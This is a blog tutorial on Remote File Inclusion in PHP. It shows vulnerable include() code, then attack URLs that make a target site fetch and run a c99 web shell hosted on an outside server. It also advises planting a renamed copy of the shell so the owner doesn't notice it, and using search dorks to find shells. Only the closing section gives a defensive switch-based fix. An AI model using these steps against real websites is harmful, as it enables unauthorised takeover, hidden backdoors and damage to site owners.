What is Remote File Inclusion & How To Use?

Remote File Inclusion is a method used to gain full access to a website. The exploit relies on the PHP include() function. Sites using this function will usually have links similar to:

index.php?file=something
index.php?page=something

If this isn't coded properly, the script doesn't check where the file is coming from and so an inclusion from another site will be accepted and run natively on the server. This means that a text file containing a PHP script can be hosted on another site but still run on the site being targeted.

Now this is where web shells come in. A web shell is a script that can handle simple tasks such as uploading, deleting and executing commands (such as SQL). The most common shell being the c99 but others are available such as the r57 and c100. This basically means that if you get a web shell to execute on an unprotected site, you will have full control over that site - and will be able to upload or delete any file you wish.

There are two types of PHP code vulnerable to this and each requires a slightly different method. You can't really know which method is being used, so you simply try both methods. The vulnerable PHP codes will look like the following examples:

<?php
$page = $_GET['page'];
include($page);
?>

<?php
$page = $_GET['page'];
include($page . ".php");
?>

How to do this

If you have found a vulnerable site, this is how to exploit it. Firstly you need to upload your shell to your own website as a text file. For this I will use www.site.com/c99.txt. Then all you do is simply put this link at the end of you vulnerable site. I will use www.example.com. So the final strings to run the web shell are:

Example1:
www.example.com/index.php?file=http://www.site.com/c99.txt

Example2:
www.example.com/index.php?file=http://www.site.com/c99.txt?
(the question mark should be at the end)

This will execute in the PHP like so:

Example1:
include('http://www.site.com/c99.txt');

Example2:
include('http://www.site.com/c99.txt?.php');

Have access?

If you have a web shell on the site, but want to make sure you still have access if the owner changes the php script you could upload your shell to their site. Save the text file to your computer and rename it from .txt to .php then simply upload it using the shell you already have on the site (www.site.com/index.php?file=http://www.site.com/c99.txt?)

But be sure to name it something that is less obvious to the site owner than c99.php so that it looks like it is part of the site. Look around at the names of the rest of the pages.

What a shell looks like

A c99.txt shell example can be found here. If you are using a c99 shell and are successful you will be displayed with a page that has:

At the top: "Safe-mode: OFF (not secure)"

Below "upload" and "make file" it says: "[ ok ]"

This means that you would have complete control over the site. A few google dorks can easily find you a real shell though since this is so popular at the moment.

Protect your website

Want to still use the index.php?file= but make sure your site isn't vulnerable to RFI? No problem, just use the "switch" statement (like this site uses) that defines the pages before hand. The code is shown below:

<?php
$page = $_GET['page'];
switch($page){
case "page1":
include("page1.php");
break;
case "page2":
include("page2.php");
break;
default: //this is for if people don't type anything
include("home.php");
break;
}
?>

SHARE

Dhirendra Biswal

Hi. I'm Dhirendra The Admin of this Blog I'm A Certified Ethical Hacker also a Web Developer With Programming Skills in various Programming Languages.

• 
• 
•